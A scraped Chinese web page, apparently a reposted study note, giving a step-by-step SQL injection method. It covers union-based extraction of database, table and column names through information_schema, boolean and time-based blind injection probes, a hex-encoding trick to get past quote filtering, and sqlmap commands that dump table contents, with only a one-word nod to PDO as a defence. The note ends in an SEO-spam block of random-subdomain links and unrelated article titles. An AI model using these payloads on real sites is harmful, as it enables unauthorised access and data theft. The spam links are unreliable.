当前位置: 首页 > wzjs >正文

网站免费软件新手制作网页的方法

网站免费软件,新手制作网页的方法,wordpress做seo好做,动漫设计作品普通sql注入:后台能提供有价值的错误信息,显示在页面 手动注入 1. 寻找sql注入点 get注入 ?idxx url后加测试是否存在注入漏洞,报错则存在 post注入 把参数封装…

普通sql注入:后台能提供有价值的错误信息,显示在页面
    手动注入
        1. 寻找sql注入点
            get注入
                ?id=xx 
                url后加'测试是否存在注入漏洞,报错则存在
            post注入
                 把参数封装在数据包中提交
                 寻找post表单:文本框,单选按钮,复选框,文件浏览,提交按钮
                 文本框内容加'测试是否存在漏洞,报错则存在
        2. 确认注入点类型(查询语句是否带'')
            数字型
                url后加 and 1=1 正常返回数据
                url后加 and 1=2 查不到数据
            字符型
                url后加 ' and 1=1# 正常返回数据
                url后加 ' and 1=2# 查不到数据
        3. 猜当前页面查询的字段总数
            order by n     逐渐加大n,直到报错
        4. 查询页面显示了哪几个字段
            url后加 and 1=2 union select 1,2,3,4,5...n
            页面中会显示相应字段出现的位置
        5. 查询当前数据库名称
            url后加 and 1=2 union select 1,2,database(),4,5...n
            3号位置显示数据库名称
        6. 查询数据库中了所有表名(mysql)
            url后加 and 1=2 union select 1,2,group_concat(table_name),4,5...n from information_schema.tables where table_schema = database()
            information_schema: mysql数据库在系统中自动创建的一个库,统计了系统中所有数据库及其数据表
        7. 查询指定表中所有字段名称
            url后加 and 1=2 union select 1,2,group_concat(column_name),4,5...n from information_schema.columns where table_name = '查询的表名'
        8. 查询指定字段的值
            url后加 and 1=2 union select 1,2,字段名,字段名,4,5...n from '表名' limit 1,1
            limit N,M : 从第 N (从0开始)条记录开始, 返回 M 条记录。

    绕过防御
        转义字符:后台可能会过滤或转义引号。把引号里的字符进行16进制的HEX转码,就无需再使用引号
        post方式:使用burpsuit抓包


    php防注入
        PDO:php data objects
盲注
    通过仅有的判断信息对表中字段进行探测
    数据库不一定是mysql,没有information_schema库
    类型
        布尔型盲注:页面可以反馈判断的对错
        延时型盲注:页面无反馈,使用sleep函数观察页面是否有延时    
    1. 寻找sql注入点
            get注入
                ?id=xx 
                url后加'测试是否存在注入漏洞,报错则存在
            post注入
                 把参数封装在数据包中提交
                 寻找post表单:文本框,单选按钮,复选框,文件浏览,提交按钮
                 文本框内容加'测试是否存在漏洞,报错则存在
    2. 确定注入点类型
        数字型
                url后加 and 1=1 正常返回数据
                url后加 and 1=2 查不到数据
        字符型
                url后加 ' and 1=1# 正常返回数据
                url后加 ' and 1=2# 查不到数据
    3. 猜数据库名的长度
        and length(database())=n  n逐渐增大
    4. 猜数据库名的单个字符
        ' and ascii(substr(database(),1,1))>97
        ' and ascii(substr(database(),1,1))<122
        通过ascii码值逐渐调整找到该字符
        注意:此substr是mysql函数,起始位置从1开始;在php中是从0开始
    5. 逐个猜出数据库名
    6. 猜该数据库有多少张表
        ' and (select count(table_name) from information_schema.tables where table_schema=database())=n
        逐渐增大n,找到表的数量
    7. 猜第一张表名的长度
        ' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1
        逐渐增大n,找到第一个表名的长度
    8. 猜第一张表,第一个字符
    9. 猜出完整表名
    10. 猜第n张表名
    11. 猜目标表的总字段数
    12. 猜字段名
    13. 猜字段值

注入工具(原理与手动注入一致)
    sqlmap注入
        get注入
            sqlmap -u 'url' --dbs    获取数据库名
            sqlmap -u 'url' -D 数据库名 --tables  获取指定数据库下的表名
            sqlmap -u 'url' -D 数据库名 -T 表名 --columns  获取指定表的字段名
            sqlmap -u 'url' -D 数据库名 -T 表名 -C 字段名,字段名 --dump  获取指定字段的值
        post注入(burpsuit开代理截取post包)
            sqlmap -r post包文件路径 --dbs  获取数据库名
            sqlmap -r post包文件路径 -D 数据库名 --tables  获取指定数据库下的表名
            sqlmap -r post包文件路径 -D 数据库名 -T 表名 --columns  获取指定表的字段名
            sqlmap -r post包文件路径 -D 数据库名 -T 表名 -C 字段名,字段名 --dump  获取指定字段的值
    啊D
    明小子旁注
    metasploit


文章转载自:

http://rpicNDsL.knrgb.cn
http://rkuv3ELk.knrgb.cn
http://jd5rgbeS.knrgb.cn
http://3TtmVCMn.knrgb.cn
http://optv8k6P.knrgb.cn
http://ztGRUJeh.knrgb.cn
http://5gk2M38S.knrgb.cn
http://4E2pmTEe.knrgb.cn
http://gqamVJB5.knrgb.cn
http://xooE3Pim.knrgb.cn
http://XMXeY0Nu.knrgb.cn
http://0C2tsCZR.knrgb.cn
http://23cbM1D7.knrgb.cn
http://QGIWZLRV.knrgb.cn
http://aa6gvYY9.knrgb.cn
http://m58V3JEr.knrgb.cn
http://kAg5xqc1.knrgb.cn
http://K67uA7HQ.knrgb.cn
http://oyO96Am5.knrgb.cn
http://wV6jffcn.knrgb.cn
http://qzzFOVWJ.knrgb.cn
http://bv2XU3AJ.knrgb.cn
http://9LD7ur3a.knrgb.cn
http://vwG95tHw.knrgb.cn
http://1n3JTgBt.knrgb.cn
http://Rk6q7KtP.knrgb.cn
http://G9nkpJMP.knrgb.cn
http://v5XosARq.knrgb.cn
http://QEZo3UHH.knrgb.cn
http://JzTD1glG.knrgb.cn
http://www.dtcms.com/wzjs/725062.html

相关文章:

  • 西安做网站价格网站建设项目方案
  • 怎样做家普网站海北营销网站建设公司
  • 什么是网站建设和维护荥阳做网站推广
  • 网站建设需要学习哪些网站搭建南京
  • 做旅游攻略的网站好不用网站做cpa
  • 南昌师范学院网站建设的意义和目的广东商城网站建设
  • 吕梁网站制作网站开发有几种语言
  • 苏州中小型网站建设网络整合营销推广
  • 潍坊恒信建设集团网站Wordpress 会员预约
  • 湖南广源建设工程有限公司网站网站开发英文术语
  • 建设网站技术公司简介实用又有创意的产品设计
  • 理财产品网站开发文档红色php企业网站模板
  • 网站建设访问对象常见的网络营销方式
  • 网站要备案吗wordpress 在线检测
  • 省建设厅网站建筑材料备案申请搭建网站大概需要多少钱
  • 美乐乐网站模板电子签名在线制作
  • 番禺品牌型网站怎么做简单地网站
  • 中性衣服印花图案设计网站@wordpress
  • 服务器网站 都被做跳转wordpress建小程序
  • 网上超市网站的设计与实现网站推广优化方法
  • 外国人做的汉子网站网络服务协议
  • 做设计挣钱的网站网站公司名称大全
  • 婚庆行业网站建设方案1合肥瑶海区新楼盘在售
  • 网站建设的预算游戏开发有前途吗
  • 免费的网页网站做一件代发的网站
  • 网站功能建设中企业寻找客户有哪些途径
  • 天津做网站的费用建设网站视频教程
  • 谁有好的网站推荐一个东莞服务公司网站建设
  • 可信网站免费认证凡科和有赞哪个好用
  • 推荐一些做网站网络公司二手房公司如何做网站